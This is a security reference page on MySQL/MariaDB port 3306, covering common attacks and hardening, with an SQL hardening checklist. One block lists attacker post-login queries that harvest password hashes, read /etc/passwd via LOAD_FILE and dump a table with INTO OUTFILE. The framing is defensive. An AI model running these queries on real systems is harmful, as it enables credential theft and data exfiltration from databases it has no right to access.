
Port 3306 (TCP) – MySQL / MariaDB

Default listener for MySQL and MariaDB relational database connections.

Protocol: TCP | IANA status: Registered | Commonly attacked

Default state

Distribution packages (Debian and Ubuntu, for example) ship with bind-address = 127.0.0.1, but upstream MySQL defaults bind_address to * (all interfaces), and many deployments set it to 0.0.0.0 so remote app servers can connect, exposing 3306 to the whole network or to the internet.

Common attacks

  • Credential brute force and password spraying against root and app accounts
  • Exploitation of empty or default passwords
  • Abuse of over-privileged accounts after login, including the FILE privilege (LOAD_FILE, SELECT ... INTO OUTFILE) to read server files and dump tables to disk
  • SQL injection pivoting into the database engine

Hardening

  • Bind to localhost or a private interface; never expose 3306 to the internet
  • Remove anonymous and empty-password accounts and the test database (run mysql_secure_installation, or mariadb-secure-installation on MariaDB)
  • Enforce strong passwords, least-privilege grants, and host-scoped users
  • Require TLS for client connections and segment with firewalls
  • Keep MySQL/MariaDB patched and monitor failed logins

nmap snippet

nmap -p3306 --script mysql-info,mysql-empty-password <target>

Replace <target> with the host or range you're authorized to scan.

What runs on port 3306?

Port 3306 is the default TCP listener for MySQL and its fork MariaDB (drop-in compatible for most clients and drivers), two of the most widely deployed relational databases. Application servers and admin clients connect over 3306 to run SQL queries against schemas that frequently back websites, SaaS products, and internal apps.

Why it matters for security

MySQL and MariaDB store the data behind countless applications, so 3306 is a prime target. The danger spikes when bind-address is set to 0.0.0.0, exposing the database to the whole network or internet. Combined with empty, default, or weak credentials, this leads directly to mass data theft and ransom, a pattern repeated across thousands of breached open databases.

How it's attacked

Attackers scan for open 3306, then run credential brute force or test for empty/default passwords. After authenticating, an account with broad privileges (or the FILE privilege) can dump tables and exfiltrate data, and SQL injection in web apps can pivot straight into the engine. Compromised databases are commonly wiped and held for ransom.
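The post-login phase described above, as an added example that is not from the original page: the queries an attacker runs from a compromised account to map its privileges and, when the account holds FILE, read files off the server and dump a table to disk. The schema `shop.customers` and the file paths are placeholders, and the block assumes MySQL 5.7+/8.0 or MariaDB. Run it only against systems you are authorized to test.

```sql
-- Added example: what an attacker does with a working login.
-- shop.customers and the file paths are hypothetical placeholders.

-- Recon: which account, which version, which privileges.
SELECT CURRENT_USER(), VERSION();
SHOW GRANTS FOR CURRENT_USER();

-- secure_file_priv gates FILE: '' means read/write anywhere the mysqld OS user can,
-- a directory restricts LOAD_FILE and INTO OUTFILE to that directory, NULL disables both.
SHOW VARIABLES LIKE 'secure_file_priv';

-- Find the largest user tables (system schemas excluded) to decide what to take first.
SELECT table_schema, table_name, table_rows
FROM information_schema.tables
WHERE table_schema NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys')
ORDER BY table_rows DESC
LIMIT 20;

-- Harvest password hashes for offline cracking and reuse elsewhere (needs SELECT on mysql.*).
SELECT user, host, plugin, authentication_string FROM mysql.user;

-- With FILE: read any file the mysqld OS user can read (NULL if blocked by secure_file_priv).
SELECT LOAD_FILE('/etc/passwd');

-- With FILE: write a whole table to the server's disk, into the directory commonly used
-- as secure_file_priv, to be collected through some other foothold on the host.
SELECT * FROM shop.customers
INTO OUTFILE '/var/lib/mysql-files/customers.csv'
FIELDS TERMINATED BY ',' ENCLOSED BY '"'
LINES TERMINATED BY '\n';

-- Without FILE, bulk exfiltration still works over the wire: mysqldump, or paged SELECTs.
```

The two FILE statements are the ones secure_file_priv and a REVOKE of FILE shut down; the hash harvest and table enumeration only need read access to mysql.* and information_schema, which is why least-privilege grants matter even for accounts that never held FILE.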

Hardening checklist

Bind MySQL to localhost or a private interface and keep 3306 off the public internet, behind a firewall, VPN, or SSH tunnel. Run mysql_secure_installation to drop anonymous and empty-password accounts, enforce strong passwords and least-privilege host-scoped grants, and require TLS. Patch regularly and monitor failed logins. Use the nmap snippet above to detect empty passwords and gather server info on hosts you are authorized to test.
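The checklist above as concrete statements, as an added example not taken from the original page. It assumes MySQL 8.0 syntax: on MariaDB use mariadb-secure-installation, put the SET PERSIST values in my.cnf instead, and use max_password_errors in place of the connection_control plugin. The account `shop_app`, the subnet 10.0.1.0/24 and the schema `shop` are placeholders.

```sql
-- Added example (MySQL 8.0 syntax); account, subnet and schema names are hypothetical.

-- 1. Confirm the listener is not on all interfaces. bind_address is not settable at
--    runtime; set it in my.cnf under [mysqld]:   bind-address = 127.0.0.1   (or a private IP).
SHOW VARIABLES LIKE 'bind_address';

-- 2. Audit for what mysql_secure_installation removes: anonymous users, empty passwords,
--    and accounts reachable from any host (CREATE USER without @host defaults to '%').
SELECT user, host, plugin, (authentication_string = '') AS empty_password
FROM mysql.user
WHERE user = '' OR authentication_string = '' OR host = '%';

-- 3. Remove them (repeat DROP USER for every anonymous row the audit returned).
DROP USER IF EXISTS ''@'localhost';
DROP DATABASE IF EXISTS test;

-- 4. Least privilege: an application account scoped to one schema and one subnet
--    that may only connect over TLS.
CREATE USER 'shop_app'@'10.0.1.%'
  IDENTIFIED BY 'replace-with-a-long-random-secret'
  REQUIRE SSL;
GRANT SELECT, INSERT, UPDATE, DELETE ON shop.* TO 'shop_app'@'10.0.1.%';

-- 5. Only DBA accounts should hold FILE or SUPER (the post-login exfiltration path).
SELECT user, host FROM mysql.user WHERE File_priv = 'Y' OR Super_priv = 'Y';
-- Disable server-side file reads and writes entirely in my.cnf:   secure-file-priv = NULL
SHOW VARIABLES LIKE 'secure_file_priv';

-- 6. Refuse plaintext client connections server-wide.
SET PERSIST require_secure_transport = ON;

-- 7. Slow down brute force: after 3 failures, delay every further attempt by at least 1 s.
INSTALL PLUGIN CONNECTION_CONTROL SONAME 'connection_control.so';
INSTALL PLUGIN CONNECTION_CONTROL_FAILED_LOGIN_ATTEMPTS SONAME 'connection_control.so';
SET PERSIST connection_control_failed_connections_threshold = 3;
SET PERSIST connection_control_min_connection_delay = 1000;

-- 8. Monitor: per-account failure counters and the global failed-connection counter.
SELECT * FROM information_schema.CONNECTION_CONTROL_FAILED_LOGIN_ATTEMPTS;
SHOW GLOBAL STATUS LIKE 'Aborted_connects';
```

Steps 1 and 5 are deliberately SHOW statements plus a my.cnf line: bind_address and secure_file_priv are read-only at runtime, so an audit can only verify them, and the fix lands in the config file followed by a restart. Everything else takes effect immediately and, with SET PERSIST, survives restarts.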

Frequently asked questions

Is it safe to expose port 3306 to the internet?
No. Internet-facing MySQL is constantly scanned and brute-forced. Bind to localhost or a private network and reach it over a VPN or SSH tunnel; TLS protects the connection's contents but does not stop password guessing against an exposed listener, so require it in addition to, not instead of, firewalling the port.
Why does my MySQL listen on 0.0.0.0?
Because bind-address was set to 0.0.0.0, often to allow remote app servers, or was left unset on a build whose default is all interfaces. Restrict it to a private interface and firewall the port to trusted hosts only.